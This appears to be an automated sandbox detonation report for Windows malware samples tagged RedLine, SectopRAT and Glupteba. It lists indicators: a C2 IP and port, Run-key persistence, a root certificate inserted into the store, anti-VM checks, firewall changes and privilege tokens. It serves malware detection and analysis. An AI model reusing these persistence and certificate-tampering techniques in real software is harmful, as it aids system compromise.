RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\udptest.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\udptest.exe
"C:\Users\Admin\AppData\Local\Temp\udptest.exe"
Network
| Country | Destination | Domain | Proto |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp | |
| FR | 193.56.146.78:51487 | tcp |
Files
memory/2220-1-0x00000000036A0000-0x00000000036C4000-memory.dmp
memory/2220-2-0x0000000000400000-0x0000000001D88000-memory.dmp
memory/2220-3-0x0000000000400000-0x0000000001D88000-memory.dmp
memory/2220-4-0x00000000039C0000-0x00000000039E2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
142s
Command Line
Signatures
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LivelyDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Checks installed software on the system
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | C:\Windows\rss\csrss.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe
"C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3584 -ip 3584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 712
C:\Windows\SysWOW64\WerFault.exe
